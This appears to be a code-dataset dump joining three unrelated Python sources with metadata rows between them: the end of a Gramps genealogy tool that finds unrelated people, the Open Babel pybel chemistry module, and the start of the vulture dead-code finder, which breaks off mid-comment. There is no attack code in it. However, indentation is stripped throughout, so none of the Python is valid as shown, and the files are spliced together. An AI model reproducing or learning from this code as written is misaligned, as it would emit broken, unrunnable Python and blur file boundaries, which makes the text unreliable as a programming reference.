# we have 4 things to do: find (1) spouses, (2) parents, (3) siblings, and (4) children
# step 1 -- spouses
for familyHandle in person.get_family_handle_list():
family = self.db.get_family_from_handle(familyHandle)
spouseHandle = utils.find_spouse(person, family)
if spouseHandle and \
spouseHandle not in self.handlesOfPeopleAlreadyProcessed:
self.handlesOfPeopleToBeProcessed.add(spouseHandle)
# step 2 -- parents
for familyHandle in person.get_parent_family_handle_list():
family = self.db.get_family_from_handle(familyHandle)
fatherHandle = family.get_father_handle()
motherHandle = family.get_mother_handle()
if fatherHandle and \
fatherHandle not in self.handlesOfPeopleAlreadyProcessed:
self.handlesOfPeopleToBeProcessed.add(fatherHandle)
if motherHandle and \
motherHandle not in self.handlesOfPeopleAlreadyProcessed:
self.handlesOfPeopleToBeProcessed.add(motherHandle)
# step 3 -- siblings
for familyHandle in person.get_parent_family_handle_list():
family = self.db.get_family_from_handle(familyHandle)
for childRef in family.get_child_ref_list():
childHandle = childRef.ref
if childHandle and \
childHandle not in self.handlesOfPeopleAlreadyProcessed:
self.handlesOfPeopleToBeProcessed.add(childHandle)
# step 4 -- children
for familyHandle in person.get_family_handle_list():
family = self.db.get_family_from_handle(familyHandle)
for childRef in family.get_child_ref_list():
childHandle = childRef.ref
if childHandle and \
childHandle not in self.handlesOfPeopleAlreadyProcessed:
self.handlesOfPeopleToBeProcessed.add(childHandle)
def findUnrelatedPeople(self):
# update our numbers
self.numberOfRelatedPeople = len(self.handlesOfPeopleAlreadyProcessed)
self.numberOfUnrelatedPeople = (self.numberOfPeopleInDatabase -
self.numberOfRelatedPeople)
if self.numberOfUnrelatedPeople > 0:
# we have at least 1 "unrelated" person to find
self.progress.set_pass(
# translators: leave all/any {...} untranslated
ngettext("Looking for {number_of} person",
"Looking for {number_of} people",
self.numberOfUnrelatedPeople
).format(number_of=self.numberOfUnrelatedPeople),
self.numberOfPeopleInDatabase)
# loop through everyone in the database
for handle in self.db.iter_person_handles():
self.progress.step()
# if this person is related, then skip to the next one
if handle in self.handlesOfPeopleAlreadyProcessed:
continue
### DEBUG DEBUG DEBUG
# if len(self.handlesOfPeopleNotRelated) > 10:
# break
###
# if we get here, we have someone who is "not related"
self.handlesOfPeopleNotRelated.add(handle)
def populateModel(self):
self.progress.set_pass(
# translators: leave all/any {...} untranslated
ngettext("Looking up the name of {number_of} person",
"Looking up the names of {number_of} people",
self.numberOfUnrelatedPeople
).format(number_of=self.numberOfUnrelatedPeople),
self.numberOfUnrelatedPeople)
# loop through the entire list of unrelated people
for handle in self.handlesOfPeopleNotRelated:
self.progress.step()
person = self.db.get_person_from_handle(handle)
primaryname = person.get_primary_name()
surname = primaryname.get_surname()
name = primaryname.get_name()
gid = person.get_gramps_id()
# Retrieve the sorted tag list
tag_list = self.get_tag_list(person)
# find the names of the parents
familygid = ''
parentNames = ''
parentFamilyHandle = person.get_main_parents_family_handle()
if parentFamilyHandle:
parentFamily = self.db.get_family_from_handle(parentFamilyHandle)
familygid = parentFamily.get_gramps_id()
fatherName = None
motherName = None
fatherHandle = parentFamily.get_father_handle()
if fatherHandle:
father = self.db.get_person_from_handle(fatherHandle)
fatherName = father.get_primary_name().get_first_name()
motherHandle = parentFamily.get_mother_handle()
if motherHandle:
mother = self.db.get_person_from_handle(motherHandle)
motherName = mother.get_primary_name().get_first_name()
# now that we have the names, come up with a label we can use
if fatherName:
parentNames += fatherName
if fatherName and motherName:
parentNames += ' & '
if motherName:
parentNames += motherName
# get the surname node (or create it if it doesn't exist)
# start with the root
iter = self.model.get_iter_first()
# look for a node with a matching surname
while iter:
if self.model.get_value(iter, 0) == surname:
break
iter = self.model.iter_next(iter)
# if we don't have a valid iter, then create a new top-level node
if not iter:
iter = self.model.append(None, [surname, '', '', '', ''])
# finally, we now get to add this person to the model
self.model.append(iter, [name, gid, parentNames, tag_list,
familygid])
def build_menu_names(self, obj):
return (self.title, None)
def get_tag_list(self, person):
"""
Return a sorted list of tag names for the given person.
"""
tags = []
for handle in person.get_tag_list():
tag = self.db.get_tag_from_handle(handle)
tags.append(tag.get_name())
tags.sort(key=glocale.sort_key)
# TODO for Arabic, should the next line's comma be translated?
return ', '.join(tags)
#------------------------------------------------------------------------
#
# NotRelatedOptions
#
#------------------------------------------------------------------------
class NotRelatedOptions(tool.ToolOptions):
"""
Defines options and provides handling interface.
"""
def __init__(self, name, person_id=None):
""" Initialize the options class """
tool.ToolOptions.__init__(self, name, person_id)
|
sam-m888/gramps
|
gramps/plugins/tool/notrelated.py
|
Python
|
gpl-2.0
| 20,402
|
[
"Brian"
] |
27161d7c6d27a8fe21c5bb6c94808457b6d6abafb6a860a0e48a92d10aea9229
|
# -*- coding: utf-8 -*-
# Copyright (c) 2008-2012, Noel O'Boyle; 2012, Adrià Cereto-Massagué
# All rights reserved.
#
# This file is part of Cinfony.
# The contents are covered by the terms of the GPL v2 license
# which is included in the file LICENSE_GPLv2.txt.
"""
pybel - A Cinfony module for accessing Open Babel
Global variables:
ob - the underlying SWIG bindings for Open Babel
informats - a dictionary of supported input formats
outformats - a dictionary of supported output formats
descs - a list of supported descriptors
fps - a list of supported fingerprint types
forcefields - a list of supported forcefields
"""
import sys
import os.path
import tempfile
import json
import uuid
import xml.etree.ElementTree as ET
if sys.platform[:4] == "java":
import org.openbabel as ob
import java.lang.System
java.lang.System.loadLibrary("openbabel_java")
_obfuncs = ob.openbabel_java
_obconsts = ob.openbabel_javaConstants
import javax
elif sys.platform[:3] == "cli":
import System
import clr
clr.AddReference('System.Windows.Forms')
clr.AddReference('System.Drawing')
from System.Windows.Forms import Application, DockStyle, Form, PictureBox
from System.Windows.Forms import PictureBoxSizeMode
from System.Drawing import Image, Size
_obdotnet = os.environ["OBDOTNET"]
if _obdotnet[0] == '"': # Remove trailing quotes
_obdotnet = _obdotnet[1:-1]
clr.AddReferenceToFileAndPath(os.path.join(_obdotnet, "OBDotNet.dll"))
import OpenBabel as ob
_obfuncs = ob.openbabel_csharp
_obconsts = ob.openbabel_csharp
else:
import openbabel as ob
_obfuncs = _obconsts = ob
try:
import Tkinter as tk
import Image as PIL
import ImageTk as piltk
except ImportError: # pragma: no cover
tk = None
def _formatstodict(list):
if sys.platform[:4] == "java":
list = [list.get(i) for i in range(list.size())]
broken = [x.replace("[Read-only]", "").replace("[Write-only]", "").split(
" -- ") for x in list]
broken = [(x, y.strip()) for x, y in broken]
return dict(broken)
def _getplugins(findplugin, names):
return dict([(x, findplugin(x)) for x in names if findplugin(x)])
def _getpluginnames(ptype):
if sys.platform[:4] == "cli":
plugins = ob.VectorString()
else:
plugins = ob.vectorString()
ob.OBPlugin.ListAsVector(ptype, None, plugins)
if sys.platform[:4] == "java":
plugins = [plugins.get(i) for i in range(plugins.size())]
return [x.split()[0] for x in plugins if x.strip()]
_obconv = ob.OBConversion()
_builder = ob.OBBuilder()
informats = _formatstodict(_obconv.GetSupportedInputFormat())
"""A dictionary of supported input formats"""
outformats = _formatstodict(_obconv.GetSupportedOutputFormat())
"""A dictionary of supported output formats"""
descs = _getpluginnames("descriptors")
"""A list of supported descriptors"""
_descdict = _getplugins(ob.OBDescriptor.FindType, descs)
fps = [_x.lower() for _x in _getpluginnames("fingerprints")]
"""A list of supported fingerprint types"""
_fingerprinters = _getplugins(ob.OBFingerprint.FindFingerprint, fps)
forcefields = [_x.lower() for _x in _getpluginnames("forcefields")]
"""A list of supported forcefields"""
_forcefields = _getplugins(ob.OBForceField.FindType, forcefields)
charges = [_x.lower() for _x in _getpluginnames("charges")]
"""A list of supported charge models"""
_charges = _getplugins(ob.OBChargeModel.FindType, charges)
operations = _getpluginnames("ops")
"""A list of supported operations"""
_operations = _getplugins(ob.OBOp.FindType, operations)
ipython_3d = False
"""Toggles 2D vs 3D molecule representations in IPython notebook"""
def readfile(format, filename, opt=None):
"""Iterate over the molecules in a file.
Required parameters:
format - see the informats variable for a list of available
input formats
filename
Optional parameters:
opt - a dictionary of format-specific options
For format options with no parameters, specify the
value as None.
You can access the first molecule in a file using the next() method
of the iterator (or the built-in next() function in Python 3):
mol = readfile("smi", "myfile.smi").next() # Python 2
mol = next(readfile("smi", "myfile.smi")) # Python 3
You can make a list of the molecules in a file using:
mols = list(readfile("smi", "myfile.smi"))
You can iterate over the molecules in a file as shown in the
following code snippet:
>>> atomtotal = 0
>>> for mol in readfile("sdf", "head.sdf"):
... atomtotal += len(mol.atoms)
...
>>> print atomtotal
43
"""
if opt is None:
opt = {}
obconversion = ob.OBConversion()
formatok = obconversion.SetInFormat(format)
for k, v in opt.items():
if v is None:
obconversion.AddOption(k, obconversion.INOPTIONS)
else:
obconversion.AddOption(k, obconversion.INOPTIONS, str(v))
if not formatok:
raise ValueError("%s is not a recognised Open Babel format" % format)
if not os.path.isfile(filename):
raise IOError("No such file: '%s'" % filename)
def filereader():
obmol = ob.OBMol()
notatend = obconversion.ReadFile(obmol, filename)
while notatend:
yield Molecule(obmol)
obmol = ob.OBMol()
notatend = obconversion.Read(obmol)
return filereader()
def readstring(format, string, opt=None):
"""Read in a molecule from a string.
Required parameters:
format - see the informats variable for a list of available
input formats
string
Optional parameters:
opt - a dictionary of format-specific options
For format options with no parameters, specify the
value as None.
Example:
>>> input = "C1=CC=CS1"
>>> mymol = readstring("smi", input)
>>> len(mymol.atoms)
5
"""
if opt is None:
opt = {}
obmol = ob.OBMol()
obconversion = ob.OBConversion()
formatok = obconversion.SetInFormat(format)
if not formatok:
raise ValueError("%s is not a recognised Open Babel format" % format)
for k, v in opt.items():
if v is None:
obconversion.AddOption(k, obconversion.INOPTIONS)
else:
obconversion.AddOption(k, obconversion.INOPTIONS, str(v))
success = obconversion.ReadString(obmol, string)
if not success:
raise IOError("Failed to convert '%s' to format '%s'" % (
string, format))
return Molecule(obmol)
class Outputfile(object):
"""Represent a file to which *output* is to be sent.
Although it's possible to write a single molecule to a file by
calling the write() method of a molecule, if multiple molecules
are to be written to the same file you should use the Outputfile
class.
Required parameters:
format - see the outformats variable for a list of available
output formats
filename
Optional parameters:
overwrite -- if the output file already exists, should it
be overwritten? (default is False)
opt -- a dictionary of format-specific options
For format options with no parameters, specify the
value as None.
Methods:
write(molecule)
close()
"""
def __init__(self, format, filename, overwrite=False, opt=None):
if opt is None:
opt = {}
self.format = format
self.filename = filename
if not overwrite and os.path.isfile(self.filename):
raise IOError(
"%s already exists. Use 'overwrite=True' to overwrite it." %
self.filename)
self.obConversion = ob.OBConversion()
formatok = self.obConversion.SetOutFormat(self.format)
if not formatok:
raise ValueError("%s is not a recognised Open Babel format" %
format)
if filename and filename.split('.')[-1] == 'gz':
self.obConversion.AddOption('z', self.obConversion.GENOPTIONS)
for k, v in opt.items():
if v is None:
self.obConversion.AddOption(k, self.obConversion.OUTOPTIONS)
else:
self.obConversion.AddOption(k, self.obConversion.OUTOPTIONS, str(v))
self.total = 0 # The total number of molecules written to the file
def write(self, molecule):
"""Write a molecule to the output file.
Required parameters:
molecule
"""
if not self.filename:
raise IOError("Outputfile instance is closed.")
if self.total == 0:
self.obConversion.WriteFile(molecule.OBMol, self.filename)
else:
self.obConversion.Write(molecule.OBMol)
self.total += 1
def close(self):
"""Close the Outputfile to further writing."""
self.obConversion.CloseOutFile()
self.filename = None
class Molecule(object):
"""Represent a Pybel Molecule.
Required parameter:
OBMol -- an Open Babel OBMol or any type of cinfony Molecule
Attributes:
atoms, charge, conformers, data, dim, energy, exactmass, formula,
molwt, spin, sssr, title, unitcell.
(refer to the Open Babel library documentation for more info).
Methods:
addh(), calcfp(), calcdesc(), draw(), localopt(), make3D(),
calccharges(), removeh(), write()
The underlying Open Babel molecule can be accessed using the attribute:
OBMol
"""
_cinfony = True
def __init__(self, OBMol):
if hasattr(OBMol, "_cinfony"):
a, b = OBMol._exchange
if a == 0:
mol = readstring("smi", b)
else:
mol = readstring("mol", b)
OBMol = mol.OBMol
self.OBMol = OBMol
@property
def atoms(self):
return [Atom(self.OBMol.GetAtom(i + 1))
for i in range(self.OBMol.NumAtoms())]
@property
def residues(self):
return [Residue(res) for res in ob.OBResidueIter(self.OBMol)]
@property
def charge(self):
return self.OBMol.GetTotalCharge()
@property
def conformers(self):
return self.OBMol.GetConformers()
@property
def data(self):
return MoleculeData(self.OBMol)
@property
def dim(self):
return self.OBMol.GetDimension()
@property
def energy(self):
return self.OBMol.GetEnergy()
@property
def exactmass(self):
return self.OBMol.GetExactMass()
@property
def formula(self):
return self.OBMol.GetFormula()
@property
def molwt(self):
return self.OBMol.GetMolWt()
@property
def spin(self):
return self.OBMol.GetTotalSpinMultiplicity()
@property
def sssr(self):
return self.OBMol.GetSSSR()
def _gettitle(self):
return self.OBMol.GetTitle()
def _settitle(self, val):
self.OBMol.SetTitle(val)
title = property(_gettitle, _settitle)
@property
def unitcell(self):
unitcell_index = _obconsts.UnitCell
if sys.platform[:3] == "cli":
unitcell_index = System.UInt32(unitcell_index)
unitcell = self.OBMol.GetData(unitcell_index)
if unitcell:
if sys.platform[:3] != "cli":
return _obfuncs.toUnitCell(unitcell)
else:
return unitcell.Downcast[ob.OBUnitCell]()
else:
raise AttributeError("Molecule has no attribute 'unitcell'")
@property
def clone(self):
return Molecule(ob.OBMol(self.OBMol))
@property
def _exchange(self):
if self.OBMol.HasNonZeroCoords():
return (1, self.write("mol"))
else:
return (0, self.write("can").split()[0])
def __iter__(self):
"""Iterate over the Atoms of the Molecule.
This allows constructions such as the following:
for atom in mymol:
print atom
"""
return iter(self.atoms)
def _repr_svg_(self):
"""For IPython notebook, renders 2D pybel.Molecule SVGs."""
# Returning None defers to _repr_javascript_
if ipython_3d:
return None
# Open babel returns a nested svg, which IPython unpacks and treats as
# two SVGs, messing with the display location. This parses out the
# inner svg before handing over to IPython.
namespace = "http://www.w3.org/2000/svg"
ET.register_namespace("", namespace)
obsvg = self.clone.write("svg")
tree = ET.fromstring(obsvg)
svg = tree.find("{{{ns}}}g/{{{ns}}}svg".format(ns=namespace))
return ET.tostring(svg).decode("utf-8")
def _repr_html_(self):
"""For IPython notebook, renders 3D pybel.Molecule webGL objects."""
# Returning None defers to _repr_svg_
if not ipython_3d:
return None
try:
import imolecule
except ImportError:
raise ImportError("Cannot import 3D rendering. Please install "
"with `pip install imolecule`.")
return imolecule.draw(self.clone, format="pybel", display_html=False)
def calcdesc(self, descnames=[]):
"""Calculate descriptor values.
Optional parameter:
descnames -- a list of names of descriptors
If descnames is not specified, all available descriptors are
calculated. See the descs variable for a list of available
descriptors.
"""
if not descnames:
descnames = descs
ans = {}
for descname in descnames:
try:
desc = _descdict[descname]
except KeyError:
raise ValueError(("%s is not a recognised Open Babel "
"descriptor type") % descname)
ans[descname] = desc.Predict(self.OBMol)
return ans
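# Illustrative use of calcdesc (a sketch; the descriptor names shown are
# only valid if they appear in the `descs` list of the local Open Babel
# build):
#   mol = readstring("smi", "CCO")
#   values = mol.calcdesc(["MW", "logP"])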
def calcfp(self, fptype="FP2"):
"""Calculate a molecular fingerprint.
Optional parameters:
fptype -- the fingerprint type (default is "FP2"). See the
fps variable for a list of available fingerprint
types.
"""
if sys.platform[:3] == "cli":
fp = ob.VectorUInt()
else:
fp = ob.vectorUnsignedInt()
fptype = fptype.lower()
try:
fingerprinter = _fingerprinters[fptype]
except KeyError:
raise ValueError(
"%s is not a recognised Open Babel Fingerprint type" % fptype)
fingerprinter.GetFingerprint(self.OBMol, fp)
return Fingerprint(fp)
def calccharges(self, model="mmff94"):
"""Estimates atomic partial charges in the molecule.
Optional parameters:
model -- default is "mmff94". See the charges variable for a list
of available charge models (in shell, `obabel -L charges`)
This method populates the `partialcharge` attribute of each atom
in the molecule in place.
"""
model = model.lower()
try:
charge_model = _charges[model]
except KeyError:
raise ValueError(
"%s is not a recognised Open Babel Charge Model type" % model)
success = charge_model.ComputeCharges(self.OBMol)
if not success:
errors = ob.obErrorLog.GetMessagesOfLevel(ob.obError)
error = errors[-1] if errors else "Molecule failed to charge."
raise Exception(error)
return [atom.partialcharge for atom in self.atoms]
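# Illustrative use of calccharges (a sketch; "gasteiger" is only valid if
# it appears in the `charges` list of the local Open Babel build):
#   mol = readstring("smi", "CCO")
#   partial_charges = mol.calccharges("gasteiger")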
def write(self, format="smi", filename=None, overwrite=False, opt=None):
"""Write the molecule to a file or return a string.
Optional parameters:
format -- see the outformats variable for a list of available
output formats (default is "smi")
filename -- default is None
overwrite -- if the output file already exists, should it
be overwritten? (default is False)
opt -- a dictionary of format specific options
For format options with no parameters, specify the
value as None.
If a filename is specified, the result is written to a file.
Otherwise, a string is returned containing the result.
To write multiple molecules to the same file you should use
the Outputfile class.
"""
if opt is None:
opt = {}
obconversion = ob.OBConversion()
formatok = obconversion.SetOutFormat(format)
if not formatok:
raise ValueError("%s is not a recognised Open Babel format" %
format)
if filename and filename.split('.')[-1] == 'gz':
obconversion.AddOption('z', obconversion.GENOPTIONS)
for k, v in opt.items():
if v is None:
obconversion.AddOption(k, obconversion.OUTOPTIONS)
else:
obconversion.AddOption(k, obconversion.OUTOPTIONS, str(v))
if filename:
if not overwrite and os.path.isfile(filename):
raise IOError(("%s already exists. Use 'overwrite=True' to "
"overwrite it.") % filename)
obconversion.WriteFile(self.OBMol, filename)
obconversion.CloseOutFile()
else:
return obconversion.WriteString(self.OBMol)
def localopt(self, forcefield="mmff94", steps=500):
"""Locally optimize the coordinates.
Optional parameters:
forcefield -- default is "mmff94". See the forcefields variable
for a list of available forcefields.
steps -- default is 500
If the molecule does not have any coordinates, make3D() is
called before the optimization. Note that the molecule needs
to have explicit hydrogens. If not, call addh().
"""
forcefield = forcefield.lower()
if self.dim != 3:
self.make3D(forcefield)
ff = _forcefields[forcefield]
success = ff.Setup(self.OBMol)
if not success:
return
ff.SteepestDescent(steps)
ff.GetCoordinates(self.OBMol)
def make3D(self, forcefield="mmff94", steps=50):
"""Generate 3D coordinates.
Optional parameters:
forcefield -- default is "mmff94". See the forcefields variable
for a list of available forcefields.
steps -- default is 50
Once coordinates are generated, hydrogens are added and a quick
local optimization is carried out with 50 steps and the
MMFF94 forcefield. Call localopt() if you want
to improve the coordinates further.
"""
forcefield = forcefield.lower()
_builder.Build(self.OBMol)
self.addh()
self.localopt(forcefield, steps)
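# Illustrative 3D workflow (a sketch mirroring the docstring above):
# generate rough coordinates, then refine them with a longer optimization.
#   mol = readstring("smi", "CCO")
#   mol.make3D()              # builds coordinates, adds H, quick cleanup
#   mol.localopt(steps=500)   # further refinement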
def addh(self):
"""Add hydrogens."""
self.OBMol.AddHydrogens()
def removeh(self):
"""Remove hydrogens."""
self.OBMol.DeleteHydrogens()
def convertdbonds(self):
"""Convert Dative Bonds."""
self.OBMol.ConvertDativeBonds()
def __str__(self):
return self.write()
def draw(self, show=True, filename=None, update=False, usecoords=False):
"""Create a 2D depiction of the molecule.
Optional parameters:
show -- display on screen (default is True)
filename -- write to file (default is None)
update -- update the coordinates of the atoms to those
determined by the structure diagram generator
(default is False)
usecoords -- don't calculate 2D coordinates, just use
the current coordinates (default is False)
Tkinter and Python Imaging Library are required for image display.
"""
obconversion = ob.OBConversion()
formatok = obconversion.SetOutFormat("_png2")
if not formatok:
raise ImportError("PNG depiction support not found. You should "
"compile Open Babel with support for Cairo. See "
"installation instructions for more "
"information.")
# Need to copy to avoid removing hydrogens from self
workingmol = Molecule(ob.OBMol(self.OBMol))
workingmol.removeh()
if not usecoords:
_operations['gen2D'].Do(workingmol.OBMol)
if update:
if workingmol.OBMol.NumAtoms() != self.OBMol.NumAtoms():
raise RuntimeError("It is not possible to update the original "
"molecule with the calculated coordinates, "
"as the original molecule contains "
"explicit hydrogens for which no "
"coordinates have been calculated.")
else:
for i in range(workingmol.OBMol.NumAtoms()):
self.OBMol.GetAtom(i + 1).SetVector(
workingmol.OBMol.GetAtom(i + 1).GetVector())
if filename:
filedes = None
else:
if sys.platform[:3] == "cli" and show:
raise RuntimeError("It is only possible to show the molecule "
"if you provide a filename. The reason for "
"this is that I kept having problems "
"when using temporary files.")
filedes, filename = tempfile.mkstemp()
workingmol.write("_png2", filename=filename, overwrite=True)
if show:
if sys.platform[:4] == "java":
image = javax.imageio.ImageIO.read(java.io.File(filename))
frame = javax.swing.JFrame(visible=1)
frame.getContentPane().add(
javax.swing.JLabel(javax.swing.ImageIcon(image)))
frame.setSize(300, 300)
frame.setDefaultCloseOperation(
javax.swing.WindowConstants.DISPOSE_ON_CLOSE)
frame.show()
elif sys.platform[:3] == "cli":
form = _MyForm()
form.setup(filename, self.title)
Application.Run(form)
else:
if not tk:
raise ImportError("Tkinter or Python Imaging Library not "
"found, but is required for image "
"display. See installation instructions "
"for more information.")
root = tk.Tk()
root.title((hasattr(self, "title") and self.title)
or self.__str__().rstrip())
frame = tk.Frame(root, colormap="new",
visual='truecolor').pack()
image = PIL.open(filename)
imagedata = piltk.PhotoImage(image)
tk.Label(frame, image=imagedata).pack()
tk.Button(root, text="Close", command=root.destroy).pack(
fill=tk.X)
root.mainloop()
if filedes:
os.close(filedes)
os.remove(filename)
class Atom(object):
"""Represent a Pybel atom.
Required parameter:
OBAtom -- an Open Babel OBAtom
Attributes:
atomicmass, atomicnum, cidx, coords, coordidx, exactmass,
formalcharge, heavyvalence, heterovalence, hyb, idx,
implicitvalence, isotope, partialcharge, residue, spin, type,
valence, vector.
(refer to the Open Babel library documentation for more info).
The original Open Babel atom can be accessed using the attribute:
OBAtom
"""
def __init__(self, OBAtom):
self.OBAtom = OBAtom
@property
def coords(self):
return (self.OBAtom.GetX(), self.OBAtom.GetY(), self.OBAtom.GetZ())
@property
def atomicmass(self):
return self.OBAtom.GetAtomicMass()
@property
def atomicnum(self):
return self.OBAtom.GetAtomicNum()
@property
def cidx(self):
return self.OBAtom.GetCIdx()
@property
def coordidx(self):
return self.OBAtom.GetCoordinateIdx()
@property
def exactmass(self):
return self.OBAtom.GetExactMass()
@property
def formalcharge(self):
return self.OBAtom.GetFormalCharge()
@property
def heavyvalence(self):
return self.OBAtom.GetHvyValence()
@property
def heterovalence(self):
return self.OBAtom.GetHeteroValence()
@property
def hyb(self):
return self.OBAtom.GetHyb()
@property
def idx(self):
return self.OBAtom.GetIdx()
@property
def implicitvalence(self):
return self.OBAtom.GetImplicitValence()
@property
def isotope(self):
return self.OBAtom.GetIsotope()
@property
def partialcharge(self):
return self.OBAtom.GetPartialCharge()
@property
def residue(self):
return Residue(self.OBAtom.GetResidue())
@property
def spin(self):
return self.OBAtom.GetSpinMultiplicity()
@property
def type(self):
return self.OBAtom.GetType()
@property
def valence(self):
return self.OBAtom.GetValence()
@property
def vector(self):
return self.OBAtom.GetVector()
def __str__(self):
c = self.coords
return "Atom: %d (%.2f %.2f %.2f)" % (self.atomicnum, c[0], c[1], c[2])
class Residue(object):
"""Represent a Pybel residue.
Required parameter:
OBResidue -- an Open Babel OBResidue
Attributes:
atoms, idx, name.
(refer to the Open Babel library documentation for more info).
The original Open Babel atom can be accessed using the attribute:
OBResidue
"""
def __init__(self, OBResidue):
self.OBResidue = OBResidue
@property
def atoms(self):
return [Atom(atom) for atom in ob.OBResidueAtomIter(self.OBResidue)]
@property
def idx(self):
return self.OBResidue.GetIdx()
@property
def name(self):
return self.OBResidue.GetName()
def __iter__(self):
"""Iterate over the Atoms of the Residue.
This allows constructions such as the following:
for atom in residue:
print atom
"""
return iter(self.atoms)
def _findbits(fp, bitsperint):
"""Find which bits are set in a list/vector.
This function is used by the Fingerprint class.
>>> _findbits([13, 71], 8)
[1, 3, 4, 9, 10, 11, 15]
"""
ans = []
start = 1
if sys.platform[:4] == "java":
fp = [fp.get(i) for i in range(fp.size())]
for x in fp:
i = start
while x > 0:
if x % 2:
ans.append(i)
x >>= 1
i += 1
start += bitsperint
return ans
class Fingerprint(object):
"""A Molecular Fingerprint.
Required parameters:
fingerprint -- a vector calculated by OBFingerprint.FindFingerprint()
Attributes:
fp -- the underlying fingerprint object
bits -- a list of bits set in the Fingerprint
Methods:
The "|" operator can be used to calculate the Tanimoto coeff. For
example, given two Fingerprints 'a', and 'b', the Tanimoto coefficient
is given by:
tanimoto = a | b
"""
def __init__(self, fingerprint):
self.fp = fingerprint
def __or__(self, other):
return ob.OBFingerprint.Tanimoto(self.fp, other.fp)
@property
def bits(self):
return _findbits(self.fp, ob.OBFingerprint.Getbitsperint())
def __str__(self):
fp = self.fp
if sys.platform[:4] == "java":
fp = [self.fp.get(i) for i in range(self.fp.size())]
return ", ".join([str(x) for x in fp])
class Smarts(object):
"""A Smarts Pattern Matcher
Required parameters:
smartspattern
Methods:
findall(molecule)
Example:
>>> mol = readstring("smi","CCN(CC)CC") # triethylamine
>>> smarts = Smarts("[#6][#6]") # Matches an ethyl group
>>> print smarts.findall(mol)
[(1, 2), (4, 5), (6, 7)]
The numbers returned are the indices (starting from 1) of the atoms
that match the SMARTS pattern. In this case, there are three matches
for each of the three ethyl groups in the molecule.
"""
def __init__(self, smartspattern):
"""Initialise with a SMARTS pattern."""
self.obsmarts = ob.OBSmartsPattern()
success = self.obsmarts.Init(smartspattern)
if not success:
raise IOError("Invalid SMARTS pattern")
def findall(self, molecule):
"""Find all matches of the SMARTS pattern to a particular molecule.
Required parameters:
molecule
"""
self.obsmarts.Match(molecule.OBMol)
vector = self.obsmarts.GetUMapList()
if sys.platform[:4] == "java":
vector = [vector.get(i) for i in range(vector.size())]
return list(vector)
class MoleculeData(object):
"""Store molecule data in a dictionary-type object
Required parameters:
obmol -- an Open Babel OBMol
Methods and accessor methods are like those of a dictionary except
that the data is retrieved on-the-fly from the underlying OBMol.
Example:
>>> mol = readfile("sdf", 'head.sdf').next() # Python 2
>>> # mol = next(readfile("sdf", 'head.sdf')) # Python 3
>>> data = mol.data
>>> print data
{'Comment': 'CORINA 2.61 0041 25.10.2001', 'NSC': '1'}
>>> print len(data), data.keys(), data.has_key("NSC")
2 ['Comment', 'NSC'] True
>>> print data['Comment']
CORINA 2.61 0041 25.10.2001
>>> data['Comment'] = 'This is a new comment'
>>> for k,v in data.items():
... print k, "-->", v
Comment --> This is a new comment
NSC --> 1
>>> del data['NSC']
>>> print len(data), data.keys(), data.has_key("NSC")
1 ['Comment'] False
"""
def __init__(self, obmol):
self._mol = obmol
def _data(self):
data = self._mol.GetData()
if sys.platform[:4] == "java":
data = [data.get(i) for i in range(data.size())]
answer = [x for x in data if
x.GetDataType() == _obconsts.PairData or
x.GetDataType() == _obconsts.CommentData]
if sys.platform[:3] != "cli":
answer = [_obfuncs.toPairData(x) for x in answer]
return answer
def _testforkey(self, key):
if key not in self:
raise KeyError("'%s'" % key)
def keys(self):
return [x.GetAttribute() for x in self._data()]
def values(self):
return [x.GetValue() for x in self._data()]
def items(self):
return iter(zip(self.keys(), self.values()))
def __iter__(self):
return iter(self.keys())
def iteritems(self): # Can remove for Python 3
return self.items()
def __len__(self):
return len(self._data())
def __contains__(self, key):
return self._mol.HasData(key)
def __delitem__(self, key):
self._testforkey(key)
self._mol.DeleteData(self._mol.GetData(key))
def clear(self):
for key in self:
del self[key]
def has_key(self, key):
return key in self
def update(self, dictionary):
for k, v in dictionary.items():
self[k] = v
def __getitem__(self, key):
self._testforkey(key)
answer = self._mol.GetData(key)
if sys.platform[:3] != "cli":
answer = _obfuncs.toPairData(answer)
return answer.GetValue()
def __setitem__(self, key, value):
if key in self:
if sys.platform[:3] != "cli":
pairdata = _obfuncs.toPairData(self._mol.GetData(key))
else:
pairdata = self._mol.GetData(key).Downcast[ob.OBPairData]()
pairdata.SetValue(str(value))
else:
pairdata = ob.OBPairData()
pairdata.SetAttribute(key)
pairdata.SetValue(str(value))
self._mol.CloneData(pairdata)
def __repr__(self):
return dict(self.items()).__repr__()
if sys.platform[:3] == "cli":
class _MyForm(Form):
def __init__(self):
Form.__init__(self)
def setup(self, filename, title):
# adjust the form's client area size to the picture
self.ClientSize = Size(300, 300)
self.Text = title
self.filename = filename
self.image = Image.FromFile(self.filename)
pictureBox = PictureBox()
# this will fit the image to the form
pictureBox.SizeMode = PictureBoxSizeMode.StretchImage
pictureBox.Image = self.image
# fit the picture box to the frame
pictureBox.Dock = DockStyle.Fill
self.Controls.Add(pictureBox)
self.Show()
if __name__ == "__main__": # pragma: no cover
import doctest
doctest.testmod(verbose=True)
|
stevenvdb/openbabel
|
scripts/python/pybel.py
|
Python
|
gpl-2.0
| 33,493
|
[
"Open Babel",
"Pybel"
] |
81b39a49528dbbeacd1ad6fbe5f0549e18feff7a27431d8a9239db43db5b1b47
|
# -*- coding: utf-8 -*-
#
# vulture - Find dead code.
#
# Copyright (C) 2012 Jendrik Seipp (jendrikseipp@web.de)
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from __future__ import print_function
import ast
from fnmatch import fnmatchcase
import os
import re
import traceback
__version__ = "0.4.1"
FORMAT_STRING_PATTERN = re.compile(r'\%\((\S+)\)s')
### Helper functions
from sys import path as sys_path
def get_possible_import_paths():
" return directories in sys.path and their children "
startdirs = ["./"]
directories = ["./"]
# keep only the sys.path entries that are existing directories
for d in sys_path:
if os.path.isdir(d):
startdirs.append(d)
directories.append(d)
# search children too
for d in startdirs:
localdirs = os.listdir(d)
#print localdirs
for p in localdirs:
full = os.path.join(d,p)
if os.path.isdir(full):
if full not in directories:
directories.append(full)
return directories
def find_module(name, directories):
" search a list of directories for name.py; return its path, or None "
for directory in directories:
path = os.path.join(directory, name + '.py')
if os.path.exists(path):
return path
return None
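# Illustrative use of the two helpers above (a sketch; 'kalman' is a
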